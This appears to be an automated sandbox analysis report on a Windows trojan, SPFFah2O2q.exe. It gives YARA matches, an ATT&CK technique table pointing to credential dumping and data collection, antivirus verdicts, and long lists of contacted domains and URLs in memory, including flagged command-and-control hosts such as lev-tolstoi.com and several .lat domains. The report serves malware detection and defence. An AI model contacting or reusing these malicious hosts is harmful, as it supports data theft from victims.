            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
            Source: Yara matchFile source: 00000000.00000002.1720458759.0000000000579000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1720458759.0000000000540000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SPFFah2O2q.exe PID: 768, type: MEMORYSTR

Remote Access Functionality

Source: Yara match; File source: sslproxydump.pcap, type: PCAP
Source: Yara match; File source: Process Memory Space: SPFFah2O2q.exe PID: 768, type: MEMORYSTR
Source: Yara match; File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK Matrix (the number in parentheses is the count of matching signatures; techniques without a number had no match):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation (1); PowerShell (1); At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (1); Process Injection (1); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (4); Software Packing (22); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Query Registry (1); Security Software Discovery (11); Virtualization/Sandbox Evasion (1); Process Discovery (1); File and Directory Discovery (1); System Information Discovery (22)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (1); Data from Local System (41); Clipboard Data (2); Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (21); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (114); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Antivirus detections for the submitted sample:

Source | Detection | Scanner | Label
SPFFah2O2q.exe | 42% | Virustotal | (link: Browse)
SPFFah2O2q.exe | 50% | ReversingLabs | Win32.Trojan.CrypterX
SPFFah2O2q.exe | 100% | Avira | HEUR/AGEN.1306956
SPFFah2O2q.exe | 100% | Joe Sandbox ML |

No Antivirus matches (dropped files, unpacked PE files, domains)

Antivirus detections for URLs:

Source | Detection | Scanner | Label
https://lev-tolstoi.com/CDaU | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com/Conte | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com/;; | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com/m/r | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com/apiC | 100% | Avira URL Cloud | malware
https://store.steamp | 0% | Avira URL Cloud | safe
https://help.steampowered.co | 100% | Avira URL Cloud | malware
https://cdn.fastly.steamstatic.c | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/https: | 100% | Avira URL Cloud | malware
Contacted domains:

Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 23.55.153.106 | true | false | | high
lev-tolstoi.com | 172.67.157.254 | true | false | | high
sustainskelet.lat | unknown | unknown | false | | high
crosshuaht.lat | unknown | unknown | false | | high
rapeflowwj.lat | unknown | unknown | false | | high
aspecteirs.lat | unknown | unknown | false | | high
grannyejh.lat | unknown | unknown | false | | high
discokeyus.lat | unknown | unknown | false | | high
energyaffai.lat | unknown | unknown | false | | high
necklacebudi.lat | unknown | unknown | false | | high
Contacted URLs and domains:

Name | Malicious | Antivirus Detection | Reputation
aspecteirs.lat | false | | high
sustainskelet.lat | false | | high
rapeflowwj.lat | false | | high
https://steamcommunity.com/profiles/76561199724331900 | false | | high
energyaffai.lat | false | | high
https://lev-tolstoi.com/api | false | | high
grannyejh.lat | false | | high
necklacebudi.lat | false | | high
crosshuaht.lat | false | | high
discokeyus.lat | false | | high
URLs found in memory or binary data:

Name | Source | Malicious | Antivirus Detection | Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | SPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | SPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp | SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steamcommunity.com/?subsection=broadcasts | SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://store.steampowered.com/subscriber_agreement/ | SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                                                high
                                                                http://www.valvesoftware.com/legal.htmSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=enSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://lev-tolstoi.com/CDaUSPFFah2O2q.exe, 00000000.00000003.1613523066.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1585634513.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1583828888.0000000002EF2000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1583861132.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1612693637.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000002.1723469776.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1584113176.0000000002EF8000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1613191723.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1613811549.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1584143316.0000000002EFC000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1583702027.0000000002EF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://lev-tolstoi.com/m/rSPFFah2O2q.exe, 00000000.00000003.1509926082.000000000050D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=englSPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englisSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://s.ytimg.com;SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRiSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://store.steampSPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://lev-tolstoi.com/dSPFFah2O2q.exe, 00000000.00000003.1533066550.000000000050D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=enSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://lev-tolstoi.com/SPFFah2O2q.exe, 00000000.00000003.1613523066.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533195787.0000000000527000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1612693637.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000002.1723469776.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000525000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1613191723.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1613811549.0000000002EFE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://store.steampowered.com/privacy_agreement/SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://store.steampowered.com/points/shop/SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=SPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://ocsp.rootca1.amazontrust.com0:SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&aSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://www.ecosia.org/newtab/SPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://steamcommunity.com/profiles/76561199724331900/inventory/SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSPFFah2O2q.exe, 00000000.00000003.1585712337.000000000318F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://lev-tolstoi.com/;;SPFFah2O2q.exe, 00000000.00000003.1509926082.000000000050D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: malware
                                                                                                              unknown
                                                                                                              https://store.steampowered.com/privacy_agreement/SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.google.com/recaptcha/SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://checkout.steampowered.com/SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://store.steampowered.com/about/SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://steamcommunity.com/my/wishlist/SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://help.steampowered.com/en/SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://steamcommunity.com/market/SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://store.steampowered.com/news/SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://store.steampowered.com/subscriber_agreement/SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533023771.00000000005A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://steamcommunity.com/discussions/SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://store.steampowered.com/stats/SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://store.steampowered.com/steam_refunds/SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://lev-tolstoi.com/https:SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                      unknown
                                                                                                                                                      http://x1.c.lencr.org/0SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://x1.i.lencr.org/0SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
Name | Source | Malicious | Antivirus Detection | Reputation
https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016 | SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e | SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steamcommunity.com/workshop/ | SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://login.steampowered.com/ | SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/products/firefoxgro.all | SPFFah2O2q.exe, 00000000.00000003.1585712337.000000000318F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c | SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://store.steampowered.com/legal/ | SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533023771.00000000005A4000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en | SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng | SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | SPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a | SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl | SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://help.steampowered.co | SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://lev-tolstoi.com/Conte | SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://lev-tolstoi.com/apiC | SPFFah2O2q.exe, 00000000.00000003.1533195787.0000000000554000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://upx.sf.net | Amcache.hve.5.dr | false | | high
https://store.steampowered.com/ | SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | false | | high
